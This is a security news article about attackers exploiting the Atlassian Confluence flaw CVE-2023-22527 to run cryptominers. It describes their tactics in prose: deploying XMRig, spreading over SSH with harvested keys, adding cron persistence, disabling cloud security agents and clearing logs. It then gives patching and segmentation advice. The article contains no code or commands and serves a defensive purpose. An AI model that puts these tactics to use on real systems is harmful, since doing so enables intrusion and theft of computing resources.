Critical Atlassian Confluence Flaw Exploited for Cryptojacking

August 28, 2024

Threat actors are continuing to exploit a critical remote code execution (RCE) bug in Atlassian Confluence that was discovered in January. New attack vectors have emerged that convert targeted cloud environments into cryptomining networks. Trend Micro has identified two distinct attacks that leverage the vulnerability—known as CVE-2023-22527—in cryptojacking attacks that consume network resources. The Atlassian Confluence server is used for enterprise-level deployments, allowing teams and organizations to create, share, and collaborate on content. The bug was rated 10 out of 10 on the Common Vulnerability Scoring System (CVSS), indicating its high potential for exploitation in attacks ranging from ransomware to cyberespionage. Now, cryptojacking has been added to that list, eight months after the flaw's discovery and subsequent patching by Atlassian.

The attacks involve threat actors deploying shell scripts and XMRig miners, targeting SSH endpoints, killing competing cryptomining processes, and maintaining persistence via cron jobs. Trend Micro has found thousands of attempts to exploit the CVE-2023-22527 over the past few months and recommends that those using the server who haven't yet patched their environments do so as soon as possible. By exploiting CVE-2023-22527, an unauthenticated attacker can achieve template injection, enabling RCE on the affected instance.

Trend Micro identified three threat actors using the bug for cryptojacking attacks. The first attack vector exploited the flaw in the public-facing Confluence Server application for initial access to the environment. Attackers then executed the XMRig miner via an ELF file payload, commandeering system resources. The second attack vector was more complex, using a shell script to execute miner activity through a shell file over Secure Shell (SSH) for all accessible endpoints in the customer environment. The attackers downloaded the shell file and ran it with bash from memory, then terminated all known cryptomining processes and any process being run from */tmp/* directories. They also deleted all cron jobs, adding a new one that runs every five minutes to check for command-and-control (C2) server communications. To evade detection, the attackers uninstalled security services such as Alibaba Cloud Shield and blocked the Alibaba Cloud Shield IP address.

The attackers identified the current machine's IP address and gathered data on all possible users, IP addresses, and keys, using the information to target other remote systems via SSH to execute further cryptomining activities. After ensuring all cloud monitoring and security services were terminated or deleted, the attacker ended the entry point process that exploits CVE-2023-22527 and downloaded the XMRig miner to begin mining activities. Once cryptomining began, the attackers then removed all traces of their activity by clearing log and bash history.

Trend Micro suggests that staying up-to-date with bug patching for software, operating systems, and applications is the most effective way to prevent such vulnerabilities from being exploited. They also recommend network segmentation to reduce the impact of exploit-based attacks, regular security audits and vulnerability assessments to uncover and address weaknesses in infrastructure before an exploit occurs, and a solid incident response plan to ensure a swift and effective reaction in case of compromise.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.